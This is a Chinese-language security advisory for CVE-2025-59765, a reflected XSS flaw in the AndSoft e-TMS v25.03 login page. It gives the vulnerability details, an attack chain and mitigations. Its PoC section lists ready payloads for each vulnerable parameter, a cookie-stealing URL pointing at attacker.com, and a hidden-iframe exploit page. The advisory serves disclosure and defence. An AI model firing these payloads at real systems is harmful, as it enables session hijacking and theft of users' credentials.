CVE-2025-59765：AndSoft e-TMS反射型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-59765

漏洞类型

反射型跨站脚本（Reflected XSS）

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

AndSoft e-TMS

漏洞概述

CVE-2025-59765是AndSoft公司开发的e-TMS（运输管理系统）v25.03版本中存在的一个反射型跨站脚本（Reflected XSS）漏洞。该漏洞由西班牙国家网络安全研究所（INCIBE）发现并报告，CVSS评分为6.1，属于中危级别漏洞。e-TMS是一款广泛应用于物流和运输行业的管理软件，用于管理运输订单、车辆调度、货物跟踪等业务。由于该软件涉及企业内部敏感数据，XSS漏洞可能被攻击者利用来窃取用户会话、获取敏感信息或执行未授权操作。

该漏洞属于反射型XSS，攻击者需要构造包含恶意JavaScript代码的URL，并通过钓鱼邮件、社交工程等方式诱导受害者点击。当受害者在已登录e-TMS系统的浏览器中访问该恶意URL时，恶意脚本将在受害者的浏览器上下文中执行。由于漏洞影响范围涉及多个参数（l、demo、demo2、TNTLOGIN、UO和SuppConn），攻击者可利用的攻击面较大。该漏洞的CVSS向量表明其通过网络利用，无需认证但需要用户交互，影响范围发生变化（Scope Changed），对机密性和完整性产生低影响。

技术细节

该漏洞存在于AndSoft e-TMS v25.03的登录页面文件'/clt/LOGINFRM_LF.ASP'中。具体而言，页面中的多个参数（l、demo、demo2、TNTLOGIN、UO和SuppConn）在接收用户输入后，未经过充分的输入验证和输出编码就直接反射到响应页面中，导致攻击者可以在这些参数中注入恶意JavaScript代码。

从技术原理来看，反射型XSS的核心问题在于服务器端将用户可控的输入未经安全处理就输出到HTML响应中。正常情况下，当用户访问登录页面时，这些参数可能用于控制页面显示的语言、演示模式或其他配置选项。然而，由于缺少对特殊字符（如<、>、"、'等）的过滤和HTML实体编码，攻击者可以构造类似如下的payload：

`http://target/clt/LOGINFRM_LF.ASP?l=<script>alert(document.cookie)</script>`

当受害者点击此链接时，恶意脚本将在受害者已认证的会话上下文中执行。攻击者可以利用此漏洞执行以下操作：1）窃取用户的会话Cookie；2）劫持用户会话；3）执行任意JavaScript代码以修改页面内容；4）窃取表单输入的敏感信息；5）进行钓鱼攻击。由于CVSS向量中包含S:C（Scope Changed），表明漏洞影响范围超出e-TMS应用本身，可能影响到用户浏览器中的其他应用。

攻击链分析

STEP 1

步骤1：信息收集

攻击者首先识别目标组织是否使用AndSoft e-TMS v25.03版本，通过网络侦察或公开信息确认目标系统的登录页面路径为/clt/LOGINFRM_LF.ASP。

STEP 2

步骤2：构造恶意URL

攻击者构造包含恶意JavaScript代码的URL，利用漏洞参数（l、demo、demo2、TNTLOGIN、UO或SuppConn）注入payload，如窃取Cookie或执行任意操作的脚本。

STEP 3

步骤3：投递恶意链接

攻击者通过钓鱼邮件、即时通讯工具或社交媒体等方式，将恶意URL发送给e-TMS系统的合法用户，诱导其点击。

STEP 4

步骤4：触发XSS执行

受害者在已登录e-TMS系统的浏览器中点击恶意链接，服务器将未经过滤的用户输入直接反射到响应页面中，导致恶意JavaScript代码在受害者浏览器上下文中执行。

STEP 5

步骤5：数据窃取与会话劫持

恶意脚本执行后，攻击者可以窃取用户的会话Cookie、登录凭证或其他敏感信息，进而劫持用户会话或执行进一步的攻击活动。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-59765 PoC - Reflected XSS in AndSoft e-TMS v25.03 -->
<!-- Vulnerable endpoint: /clt/LOGINFRM_LF.ASP -->
<!-- Vulnerable parameters: l, demo, demo2, TNTLOGIN, UO, SuppConn -->

<!-- Basic PoC: Inject JavaScript via 'l' parameter -->
<!-- URL: http://target/clt/LOGINFRM_LF.ASP?l=<script>alert('XSS')</script> -->

<!-- Cookie stealing PoC -->
<!-- URL: http://target/clt/LOGINFRM_LF.ASP?l=<script>document.location='http://attacker.com/steal?c='+document.cookie</script> -->

<!-- PoC using 'demo' parameter -->
<!-- URL: http://target/clt/LOGINFRM_LF.ASP?demo=<img src=x onerror=alert(document.domain)> -->

<!-- PoC using 'TNTLOGIN' parameter -->
<!-- URL: http://target/clt/LOGINFRM_LF.ASP?TNTLOGIN="><svg onload=alert(1)> -->

<!-- PoC using 'UO' parameter -->
<!-- URL: http://target/clt/LOGINFRM_LF.ASP?UO=<body onload=alert('XSS')> -->

<!-- PoC using 'SuppConn' parameter -->
<!-- URL: http://target/clt/LOGINFRM_LF.ASP?SuppConn=<iframe src=javascript:alert(1)> -->

<!-- Full HTML exploit page example -->
<!DOCTYPE html>
<html>
<head><title>CVE-2025-59765 PoC</title></head>
<body>
    <h1>CVE-2025-59765 - AndSoft e-TMS Reflected XSS</h1>
    <iframe src="http://target/clt/LOGINFRM_LF.ASP?l=<script>alert(document.cookie)</script>" width="0" height="0"></iframe>
    <p>If the victim is logged in, the JavaScript will execute in their browser context.</p>
</body>
</html>

影响范围

AndSoft e-TMS v25.03

防御指南

临时缓解措施

在官方修复版本发布之前，建议采取以下临时缓解措施：1）在Web服务器或反向代理层面部署WAF规则，过滤包含<script>、onerror=、onload=等常见XSS payload特征的请求；2）实施严格的输入验证，对URL参数中的特殊字符（<、>、"、'、&等）进行过滤或URL编码；3）配置Content Security Policy响应头，限制内联脚本执行；4）为所有会话Cookie添加HttpOnly和Secure属性；5）加强用户安全意识培训，警惕可疑链接；6）监控异常的网络请求和用户活动日志，及时发现潜在的攻击行为。